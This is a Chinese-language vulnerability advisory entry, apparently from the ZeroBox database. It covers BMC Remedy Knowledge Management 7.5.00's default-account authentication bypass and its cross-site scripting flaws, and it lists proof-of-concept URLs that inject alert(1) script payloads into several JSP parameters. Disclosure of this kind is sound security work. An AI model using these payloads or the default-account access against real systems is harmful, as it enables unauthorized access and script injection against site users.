BMC Remedy Knowledge Management默认账户和跨站脚本漏洞 | ZeroBox Vulnerability Database

首页

菜单

BMC Remedy Knowledge Management默认账户和跨站脚本漏洞

发表评论 (0) 查看评论

漏洞起因
输入验证错误
危险等级
低

影响系统
BMC Software Remedy Knowledge Management 7.5.00

不受影响系统

危害
远程攻击者可以利用漏洞获得敏感信息或绕过验证访问受限资源。

攻击所需条件
攻击者必须访问BMC Dashboards。

漏洞信息
BMC Remedy知识库管理是一个用于创建，出版，审查和搜索IT资讯知识文章的框架。
BMC Remedy知识库管理存在多个输入漏洞，允许攻击者进行跨站脚本攻击。
另外BMC Remedy知识库管理使用内置的默认账户，可被利用绕过验证。
https://target-domain.foo/rkm/index.jsp?user=Self%20Help

测试方法
https://target-domain.foo/rkm/external.jsp?doc=’%3balert(1)//&user=Self+
Help
https://target-domain.foo/rkm/search.jsp?user=Self+Help&startDate=\’%3ba
lert(1)//
https://target-domain.foo/rkm/usersettings.jsp?"><script>alert(1)</scrip
t>
https://target-domain.foo/rkm/viewdoc.jsp?doc=><script>alert(1)</script>
&user=Self%20Help
https://target-domain.foo/rkm/AttachmentServlet?="><script>alert(1)</scr
ipt>

厂商解决方案
目前没有详细解决方案提供：
http://www.bmc.com/

漏洞提供者
Richard Brain and Jan Fry of ProCheckUp Ltd.

漏洞消息链接
http://www.securityfocus.com/archive/1/517888

← SSSD Kerberos票据更新缓存密码安全绕过漏洞

BMC Dashboards跨站脚本和信息泄露漏洞 →

发表评论？

0 条评论。

发表评论

要发表评论，您必须先登录。